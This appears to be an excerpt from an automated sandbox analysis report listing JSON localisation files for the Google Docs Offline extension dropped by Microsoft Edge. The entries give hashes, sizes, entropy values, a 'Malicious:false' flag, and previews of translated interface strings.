                                                                                                                                                                                                                                                                SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):990
                                                                                                                                                                                                                                                                Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1658
                                                                                                                                                                                                                                                                Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1672
                                                                                                                                                                                                                                                                Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):935
                                                                                                                                                                                                                                                                Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1065
                                                                                                                                                                                                                                                                Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                                                                                                                                MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                                                                                                                                SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                                                                                                                                SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                                                                                                                                SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2771
                                                                                                                                                                                                                                                                Entropy (8bit):3.7629875118570055
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                                                                                                                                MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                                                                                                                                SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                                                                                                                                SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                                                                                                                                SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):858
                                                                                                                                                                                                                                                                Entropy (8bit):4.474411340525479
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                                                                                                                                MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                                                                                                                                SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                                                                                                                                SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                                                                                                                                SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):954
                                                                                                                                                                                                                                                                Entropy (8bit):4.6457079159286545
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                                                                                                                                MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                                                                                                                                SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                                                                                                                                SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                                                                                                                                SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):899
                                                                                                                                                                                                                                                                Entropy (8bit):4.474743599345443
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                                                                                                                                MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                                                                                                                                SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                                                                                                                                SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                                                                                                                                SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2230
                                                                                                                                                                                                                                                                Entropy (8bit):3.8239097369647634
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                                                                                                                                MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                                                                                                                                SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                                                                                                                                SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                                                                                                                                SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1160
                                                                                                                                                                                                                                                                Entropy (8bit):5.292894989863142
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                                                                                                                                MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                                                                                                                                SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                                                                                                                                SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                                                                                                                                SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3264
                                                                                                                                                                                                                                                                Entropy (8bit):3.586016059431306
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                                                                                                                                MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                                                                                                                                SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                                                                                                                                SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                                                                                                                                SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3235
                                                                                                                                                                                                                                                                Entropy (8bit):3.6081439490236464
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
                                                                                                                                                                                                                                                                MD5:2D94A58795F7B1E6E43C9656A147AD3C
                                                                                                                                                                                                                                                                SHA1:E377DB505C6924B6BFC9D73DC7C02610062F674E
                                                                                                                                                                                                                                                                SHA-256:548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
                                                                                                                                                                                                                                                                SHA-512:F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):3122
                                                                                                                                                                                                                                                                Entropy (8bit):3.891443295908904
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
                                                                                                                                                                                                                                                                MD5:B3699C20A94776A5C2F90AEF6EB0DAD9
                                                                                                                                                                                                                                                                SHA1:1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
                                                                                                                                                                                                                                                                SHA-256:A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
                                                                                                                                                                                                                                                                SHA-512:1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1895
                                                                                                                                                                                                                                                                Entropy (8bit):4.28990403715536
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/U0WG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZ0J
                                                                                                                                                                                                                                                                MD5:38BE0974108FC1CC30F13D8230EE5C40
                                                                                                                                                                                                                                                                SHA1:ACF44889DD07DB97D26D534AD5AFA1BC1A827BAD
                                                                                                                                                                                                                                                                SHA-256:30078EF35A76E02A400F03B3698708A0145D9B57241CC4009E010696895CF3A1
                                                                                                                                                                                                                                                                SHA-512:7BDB2BADE4680801FC3B33E82C8AA4FAC648F45C795B4BACE4669D6E907A578FF181C093464884C0E00C9762E8DB75586A253D55CD10A7777D281B4BFFAFE302
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1042
                                                                                                                                                                                                                                                                Entropy (8bit):5.3945675025513955
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
                                                                                                                                                                                                                                                                MD5:F3E59EEEB007144EA26306C20E04C292
                                                                                                                                                                                                                                                                SHA1:83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
                                                                                                                                                                                                                                                                SHA-256:C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
                                                                                                                                                                                                                                                                SHA-512:7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):2535
                                                                                                                                                                                                                                                                Entropy (8bit):3.8479764584971368
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
                                                                                                                                                                                                                                                                MD5:E20D6C27840B406555E2F5091B118FC5
                                                                                                                                                                                                                                                                SHA1:0DCECC1A58CEB4936E255A64A2830956BFA6EC14
                                                                                                                                                                                                                                                                SHA-256:89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
                                                                                                                                                                                                                                                                SHA-512:AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                Size (bytes):1028
                                                                                                                                                                                                                                                                Entropy (8bit):4.797571191712988
                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                SSDEEP:24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
                                                                                                                                                                                                                                                                MD5:970544AB4622701FFDF66DC556847652
                                                                                                                                                                                                                                                                SHA1:14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
                                                                                                                                                                                                                                                                SHA-256:5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
                                                                                                                                                                                                                                                                SHA-512:CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
                                                                                                                                                                                                                                                                Malicious:false
